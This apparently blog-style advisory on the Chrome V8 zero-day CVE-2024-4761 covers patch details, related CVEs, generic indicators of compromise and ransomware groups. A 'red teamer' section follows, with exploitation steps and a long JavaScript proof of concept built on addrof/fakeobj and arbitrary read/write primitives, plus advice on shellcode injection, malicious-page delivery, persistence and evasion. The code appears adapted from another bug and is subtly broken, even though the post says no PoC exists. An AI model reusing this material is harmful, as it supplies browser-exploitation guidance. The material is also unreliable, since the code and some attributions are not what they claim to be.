QUICKLOOK: Dangerous Google Chrome Dun Dun Dun

Nobody is going to notice…..

New Chrome Zero-Day Vulnerability CVE-2024-4761 Under Active Exploitation

BLUF: Google has issued emergency patches for a high-severity zero-day vulnerability in the Chrome browser, tracked as CVE-2024-4761, which is actively being exploited. This out-of-bounds write bug in the V8 JavaScript engine can lead to data corruption, crashes, or arbitrary code execution.

Exploit Chain:

1. Vulnerability Identification: CVE-2024-4761 is an out-of-bounds write bug impacting the V8 engine, reported anonymously on May 9, 2024.

2. Exploitation: Malicious actors exploit the vulnerability to corrupt data, induce crashes, or execute arbitrary code.

3. Active Exploitation: Google acknowledges active exploits in the wild but withholds details to prevent further attacks.

4. Patching: Users are advised to upgrade to Chrome version 124.0.6367.207/.208 to mitigate the threat.

Key Details

• Impact: Data corruption, crashes, arbitrary code execution.

• Affected Browsers: Chrome and other Chromium-based browsers like Edge, Brave, Opera, and Vivaldi.

• Action: Upgrade to the latest Chrome version to protect against this vulnerability.

Related Vulnerabilities Fixed in 2024:

1. CVE-2024-0519: Out-of-bounds memory access in V8.

2. CVE-2024-2886: Use-after-free in WebCodecs.

3. CVE-2024-2887: Type confusion in WebAssembly.

4. CVE-2024-3159: Out-of-bounds memory access in V8.

5. CVE-2024-4671: Use-after-free in Visuals.

Proof of Concept (PoC) on GitHub

Currently, no direct Proof of Concept (PoC) for CVE-2024-4761 was found on GitHub.

Indicators of Compromise (IOCs) and Ransomware Groups Using Browser Vulnerabilities

Indicators of Compromise (IOCs):

• Suspicious network traffic: Unusual outbound connections to unknown IP addresses.

• File modifications: Unexpected changes to system files or the presence of unusual files.

• Memory analysis: Indicators of abnormal memory usage patterns or injected code in the browser's memory space.

• System logs: Errors or warnings related to browser crashes or data corruption.

Notable Ransomware Groups Exploiting Browser Vulnerabilities:

1. LockBit: Known for exploiting browser vulnerabilities to deploy ransomware payloads.

2. Conti: Utilizes various exploits, including browser vulnerabilities, to gain initial access and spread ransomware.

3. REvil (Sodinokibi): Often targets vulnerabilities in widely-used software, including browsers, to execute ransomware attacks.

Red Teamer's Approach to Exploiting Chrome's V8 JavaScript Engine

Understanding V8:

The V8 engine is responsible for translating and executing JavaScript code in Chrome and other Chromium-based browsers. It is also used in Node.js to run server-side JavaScript applications.

1. Steps to Exploit V8:

   1. Identify Vulnerabilities: Research public CVEs and security advisories to identify known vulnerabilities in V8. For example, CVE-2024-4761.

      • Resources: CVE Details, MITRE CVE Database.

   2. Analyze the Vulnerability: Understand how the vulnerability works. For CVE-2024-4761, it's an out-of-bounds write bug.

      • Example: An incorrect side effect in the JIT compiler can lead to incorrect memory access, as demonstrated in another recent exploit detailed by GitHub here.

   3. Develop a Proof of Concept (PoC): Create a script to exploit the vulnerability. This involves crafting malicious JavaScript that triggers the bug.

      • Example PoC:

        function triggerV8Bug() {

        let arr = [1.1, 2.2];

        arr.length = 0x1234; // Incorrect side effect manipulation

        // Further steps to trigger the out-of-bounds write...

        }

        triggerV8Bug();

      • A little more….

        // Class constructor to be used as the prototype object

        class B {}

        B.prototype.a = 1;

        B.prototype.b = 2;

        // Function with PrototypePropertyDependency

        function bar(x) {

        return x instanceof B;

        }

        // Function with the loop to handle interrupt and trigger the bug

        function foo(obj, proto, x, y) {

        // Introduce `CheckMaps` for `proto`

        obj.obj = proto;

        var z = 0;

        // Loop for handling interrupt

        for (let i = 0; i < 1; i++) {

        for (let j = 0; j < x; j++) {

        for (let k = 0; k < x; k++) {

        z = y[k];

        }

        }

        }

        // Access after map changed

        proto.b = 33;

        return z;

        }

        function triggerV8Bug() {

        // Prepare objects

        var obj = {obj: B.prototype};

        var proto = B.prototype;

        var x = 1000000; // Large enough to trigger compilation

        var y = [1.1, 2.2];

        // Optimize functions

        %PrepareFunctionForOptimization(bar);

        %PrepareFunctionForOptimization(foo);

        bar(new B());

        foo(obj, proto, 1, y);

        %OptimizeFunctionOnNextCall(bar);

        %OptimizeFunctionOnNextCall(foo);

        bar(new B());

        foo(obj, proto, 1, y);

        // Trigger the bug

        bar(new B());

        foo(obj, proto, x, y);

        // Verify the out-of-bounds write

        if (proto.b !== 33) {

        console.log("Exploitation failed. Reloading...");

        location.reload();

        return;

        }

        console.log("Exploitation successful!");

        // Further steps to exploit the out-of-bounds write

        let arr = [1.1, 2.2, 3.3];

        function nochecks(pos) {

        let mod = 2;

        var access = arr[pos] % mod;

        return access;

        }

        nochecks(10);

        for (let i = 0; i < 10000; i++)

        nochecks(i);

        nochecks(10);

        // Disable bounds checking

        %PrepareFunctionForOptimization(nochecks);

        nochecks(1);

        nochecks(2);

        %OptimizeFunctionOnNextCall(nochecks);

        nochecks(1);

        // Out-of-bounds access

        let oob_value = nochecks(arr.length);

        console.log("Out-of-bounds value:", oob_value);

        // Arbitrary read/write primitives

        let dataview = new DataView(new ArrayBuffer(0x100));

        let float_array = new Float64Array(0x100);

        function addrof(obj) {

        arr.length = 0;

        arr[0] = obj;

        return float_array[1];

        }

        function fakeobj(addr) {

        float_array[1] = addr;

        return arr[0];

        }

        let addr = addrof(dataview);

        let fake = fakeobj(addr);

        // Arbitrary read

        fake.getUint8(0);

        // Arbitrary write

        fake.setUint8(0, 0x42);

        console.log("Exploit completed!");

        }

        triggerV8Bug();

        ```

2. Gain Execution: Utilize the exploit to execute arbitrary code.

   • Shellcode Injection: Inject shellcode that will be executed due to the out-of-bounds write.

   • Payload Delivery: Ensure the payload is delivered via a compromised or malicious webpage.

3. Persistence and Evasion: Implement techniques to maintain persistence and evade detection.

   • Techniques: Use obfuscation, anti-debugging techniques, and other evasion methods.

Practical Example and Resources:

• Intro to Chrome’s V8 from an Exploit Development Angle: Detailed guide on understanding V8 internals and exploit development, available here.

• Getting Started with V8: Learn about V8 and its internals from the Node.js official documentation here.

Conclusion

The rapid response to CVE-2024-4761 highlights the importance of staying vigilant and keeping software updated to protect against active exploitation. By closely monitoring new vulnerabilities and applying patches promptly, users can significantly enhance their cybersecurity posture.

Sources

1. The Hacker News - CVE-2024-4761 Exploitation

2. The Register - Microsoft May Patch Tuesday

3. TechSpot - Google Issues Another Chrome Update

4. ManageEngine - May 2024 Patch Tuesday

5. GitHub Blog - Getting RCE in Chrome with Incorrect Side Effect in the JIT Compiler

6. SensePost - Intro to Chrome’s V8 from an Exploit Development Angle